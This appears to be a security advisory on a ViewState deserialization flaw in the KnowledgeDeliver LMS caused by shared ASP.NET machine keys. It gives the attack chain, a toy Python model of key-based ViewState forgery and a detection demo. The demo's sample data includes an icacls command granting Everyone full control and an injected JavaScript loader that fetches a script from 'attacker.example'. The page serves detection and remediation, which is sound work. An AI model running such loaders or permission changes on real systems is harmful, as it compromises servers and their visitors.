KnowledgeDeliver ViewState Deserialization Vulnerability Exploitation
An unauthenticated remote code execution vulnerability, CVE-2026-5426, in Digital Knowledge's KnowledgeDeliver LMS platform, caused by ASP.NET machine keys shared across customer deployments, lets an attacker forge a ViewState that the server accepts and deserializes; in the investigated incident this led to Cobalt Strike BEACON infection of user workstations.
In late 2025, Mandiant investigated a security incident involving a compromised KnowledgeDeliver web server. KnowledgeDeliver, a Learning Management System (LMS) by Digital Knowledge, was found to be vulnerable to unauthenticated Remote Code Execution (RCE) because deployments installed before February 24, 2026 shipped with identical pre-shared ASP.NET machine keys. ASP.NET protects the `__VIEWSTATE` field only with a MAC computed under the machineKey validation key, so anyone holding a key that is common to every installation can produce ViewState that passes the integrity check and is deserialized by the server. This vulnerability, tracked as CVE-2026-5426, allowed an unknown threat actor to inject malicious code into the LMS platform. The attacker's goal was to compromise users visiting the site through web shell deployment, file tampering, and eventual Cobalt Strike BEACON infection of user workstations. This highlights the critical importance of maintaining unique and secret machine keys for ASP.NET applications.
Attack Chain
- The attacker identifies a KnowledgeDeliver instance still using the pre-shared ASP.NET machine keys.
- The attacker crafts a malicious ViewState payload for CVE-2026-5426: a serialized object graph that executes code when deserialized, signed with the known validation key so that it passes the server's ViewState MAC check.
- The attacker sends the crafted payload in the `__VIEWSTATE` parameter of an HTTP POST request to the vulnerable KnowledgeDeliver server.
- The server deserializes the malicious ViewState, leading to code execution inside the `w3wp.exe` (IIS worker) process.
- The attacker deploys BLUEBEAM, a .NET-based Godzilla in-memory web shell, inside the `w3wp.exe` process for persistence and command execution.
- The attacker runs `icacls` to grant "Everyone" full access to the web application directory, weakening the directory ACLs so that application files can be modified from the web shell (the detection rule on this page classes this as privilege escalation).
- The attacker modifies a JavaScript file to display a fake security alert, prompting users to install a malicious "security authentication plugin".
- The modified JavaScript silently loads a remote malicious script hosted on an attacker-controlled domain, ultimately leading to Cobalt Strike BEACON infection of user workstations.
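To make the shared-key problem in the chain above concrete, the following is a simplified model written for this page; it is not KnowledgeDeliver's, Mandiant's or ASP.NET's code. It assumes a plain HMAC-SHA256 over the serialized state, whereas real ASP.NET derives purpose-specific keys from `<machineKey>` and serializes with ObjectStateFormatter; the `SHARED_KEY` value is a constructed stand-in for the vendor-wide key, and `unique_machinekey_element()` only emits the standard ASP.NET `<machineKey>` element format, not a KnowledgeDeliver-specific setting.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed illustration: a simplified model of the ASP.NET ViewState integrity
# check. Real ASP.NET derives per-purpose keys from <machineKey> and serializes with
# ObjectStateFormatter; this model keeps only the property that matters for
# CVE-2026-5426: the MAC protects nothing once the validation key is shared.

TAG_LEN = 32  # HMAC-SHA256 digest length


def mac_viewstate(validation_key: bytes, state: bytes) -> bytes:
    """What the server does on render: state || HMAC(validation_key, state)."""
    return state + hmac.new(validation_key, state, hashlib.sha256).digest()


def verify_viewstate(validation_key: bytes, blob: bytes) -> Optional[bytes]:
    """What the server does on postback; None models event code 4009 (verification failed)."""
    if len(blob) <= TAG_LEN:
        return None
    state, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(validation_key, state, hashlib.sha256).digest()
    return state if hmac.compare_digest(tag, expected) else None


def server_handle_post(validation_key: bytes, viewstate: bytes) -> str:
    state = verify_viewstate(validation_key, viewstate)
    if state is None:
        return "rejected: ViewState verification failed (event code 4009)"
    # Real ASP.NET deserializes attacker-chosen objects at this point; the model just
    # returns the state to show that, once the MAC passes, its content is trusted.
    return "deserialized: " + state.decode()


def forge_viewstate(known_key: bytes, payload: bytes) -> bytes:
    """An attacker who knows the validation key signs exactly as the server does."""
    return mac_viewstate(known_key, payload)


def unique_machinekey_element() -> str:
    """Per-deployment <machineKey> element in the standard ASP.NET format (assumed
    remediation shape, not from the page). HMACSHA256 is commonly given a 64-byte
    validationKey and AES a 32-byte decryptionKey, both hex-encoded."""
    return (
        '<machineKey validationKey="%s" decryptionKey="%s" '
        'validation="HMACSHA256" decryption="AES" />'
        % (secrets.token_hex(64), secrets.token_hex(32))
    )


# Constructed stand-in for the key that shipped in every pre-patch web.config.
SHARED_KEY = b"same-validationKey-in-every-customer-web.config"


def demo() -> dict:
    payload = b"<attacker-chosen object graph>"
    forged = forge_viewstate(SHARED_KEY, payload)
    return {
        # Pre-patch: the customer's server uses the very key the attacker holds.
        "shared_key": server_handle_post(SHARED_KEY, forged),
        # Remediated: this deployment has its own random key; the forgery fails the MAC.
        "unique_key": server_handle_post(secrets.token_bytes(64), forged),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
    print(unique_machinekey_element())
```

The two outcomes in `demo()` are the whole story of the vulnerability: the integrity check is sound, but it only proves that whoever produced the ViewState knew the key, and a key present in every installation proves nothing. Rotating to a unique key per deployment (and, in real ASP.NET, keeping `enableViewStateMac` on and setting a `ViewStateUserKey`) is what turns the same check back into a barrier.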
Impact
Successful exploitation of CVE-2026-5426 allows an attacker to achieve unauthenticated remote code execution on KnowledgeDeliver servers. This can lead to the deployment of web shells, file tampering, and the infection of user workstations with malware such as Cobalt Strike. The modified JavaScript file displays a fake security alert, which tricks users into installing a malicious “security authentication plugin”, leading to further compromise. This incident underscores the critical risk posed by shared machine keys in ASP.NET applications.
Recommendation
- Monitor the Windows Application log for Event ID 1316 from the `ASP.NET 4.0.30319.0` source, in particular entries carrying event code 4009 ("Viewstate verification failed"), as described in the overview. Note that a payload signed with the correct (shared) key passes verification and produces no such event; 4009 entries indicate ViewState that failed the MAC check, for example probing with keys taken from other products or versions.
- Monitor for unusual child processes of `w3wp.exe` (the IIS worker process), such as `cmd.exe`, `whoami` and `powershell.exe`, as mentioned in the "Suspicious Process Activity" section.
- Implement file integrity monitoring for `.js`, `.aspx` and `.config` files within the web root to detect unauthorized modifications, including the addition of remote script loaders, as described in the "File Integrity Monitoring" section.
- Deploy the Sigma rule "Detect KnowledgeDeliver BLUEBEAM Webshell Deployment" to detect post-exploitation activity related to web shell deployment.
- Replace the pre-shared `<machineKey>` with unique, randomly generated keys on every deployment; as the overview notes, the shared key is the root cause, and detection alone does not remove it.
Detection coverage (2 rules)
Detect KnowledgeDeliver BLUEBEAM Webshell Deployment (severity: high)
Detects potential deployment of the BLUEBEAM webshell (Godzilla) by monitoring process creation events from w3wp.exe with suspicious command line arguments.
Detect KnowledgeDeliver ICACLS Permission Changes (severity: medium)
Detects potential privilege escalation through an ICACLS command that grants Everyone full access to the web application directory.
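The recommendations above and the two coverage rules describe four detections; the block below is an added example written for this page that implements each of them over constructed sample data. It is not the platform's Sigma rules or Mandiant's queries, the process and log records are hand-built in the shape of Sysmon event ID 1 and Windows Application log entries (not real incident telemetry), the file paths and the `attacker.example` domain are assumptions, and the file-integrity part stages a throwaway web root in a temporary directory.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed telemetry (not real incident data): Sysmon-style process creation events.
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\icacls.exe",
     "CommandLine": r'icacls "C:\inetpub\wwwroot\KnowledgeDeliver" /grant Everyone:(F) /T'},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},   # routine w3wp child
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},                                                     # interactive, not IIS
]
# Constructed Windows Application log records; the 4009 message text is ASP.NET's own wording.
APP_LOG = [
    {"Source": "ASP.NET 4.0.30319.0", "EventID": 1316,
     "Message": "Event code: 4009\nEvent message: Viewstate verification failed. Reason: "
                "The viewstate supplied failed integrity check.\nRequest path: /Default.aspx"},
    {"Source": "ASP.NET 4.0.30319.0", "EventID": 1309,
     "Message": "Event code: 3005\nEvent message: An unhandled exception has occurred."},
]


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Rule 1: w3wp.exe spawning a shell or recon binary (the BLUEBEAM post-exploitation pattern).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe"}


def w3wp_suspicious_child(ev: dict) -> bool:
    return image_name(ev["ParentImage"]) == "w3wp.exe" and image_name(ev["Image"]) in SUSPICIOUS_CHILDREN


# Rule 2: icacls granting Everyone (by name or well-known SID S-1-1-0) full control,
# matching the plain "(F)" form as well as inheritance-flagged forms like "(OI)(CI)F".
ICACLS_EVERYONE_FULL = re.compile(r'/grant(?::r)?\s+"?(?:everyone|\*s-1-1-0)"?:[\w()]*\bf\b', re.I)


def icacls_everyone_full(ev: dict) -> bool:
    return image_name(ev["Image"]) == "icacls.exe" and bool(ICACLS_EVERYONE_FULL.search(ev["CommandLine"]))


# Rule 3: ASP.NET Event ID 1316 carrying event code 4009 (ViewState failed its MAC check).
def viewstate_verification_failed(rec: dict) -> bool:
    return rec["Source"].startswith("ASP.NET") and rec["EventID"] == 1316 and "Event code: 4009" in rec["Message"]


# Rule 4: file integrity baseline over .js/.aspx/.config, reporting newly introduced external URLs.
WATCHED = {".js", ".aspx", ".config"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def snapshot(webroot: Path) -> dict:
    """path -> (sha256, external URLs referenced) for every watched file under webroot."""
    out = {}
    for p in webroot.rglob("*"):
        if p.is_file() and p.suffix.lower() in WATCHED:
            data = p.read_bytes()
            urls = set(URL_RE.findall(data.decode("utf-8", "replace")))
            out[p.relative_to(webroot).as_posix()] = (hashlib.sha256(data).hexdigest(), urls)
    return out


def diff_snapshots(before: dict, after: dict) -> list:
    findings = []
    for path, (digest, urls) in sorted(after.items()):
        old = before.get(path)
        if old is None:
            findings.append((path, "added", sorted(urls)))
        elif old[0] != digest:
            findings.append((path, "modified", sorted(urls - old[1])))
    findings += [(path, "deleted", []) for path in sorted(before.keys() - after.keys())]
    return findings


def run_demo() -> dict:
    """Apply all four rules to the constructed data; the FIM part stages a web root in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Scripts").mkdir()
        js = root / "Scripts" / "common.js"
        js.write_text("function showLogin() { /* original application code */ }\n")
        (root / "web.config").write_text("<configuration></configuration>\n")
        baseline = snapshot(root)
        # Constructed tampering in the style described above: append a remote script loader.
        js.write_text(js.read_text() + "var s=document.createElement('script');"
                      "s.src='https://attacker.example/auth-plugin.js';document.head.appendChild(s);\n")
        fim = diff_snapshots(baseline, snapshot(root))
    return {
        "w3wp_children": [ev["CommandLine"] for ev in PROCESS_EVENTS if w3wp_suspicious_child(ev)],
        "icacls": [ev["CommandLine"] for ev in PROCESS_EVENTS if icacls_everyone_full(ev)],
        "viewstate_failures": [rec["EventID"] for rec in APP_LOG if viewstate_verification_failed(rec)],
        "fim": fim,
    }


if __name__ == "__main__":
    for name, hits in run_demo().items():
        print(f"{name}: {hits}")
```

Two design points matter in practice. Rule 3 fires only when the MAC check fails, so it will not see a payload signed with the correct shared key; it is a probing signal (wrong or outdated keys) that complements, rather than replaces, the process and file rules. Rule 4 reports the URLs that appeared in a changed file rather than just the hash change, which is what lets an analyst separate a legitimate deployment from a remote script loader of the kind used in this incident.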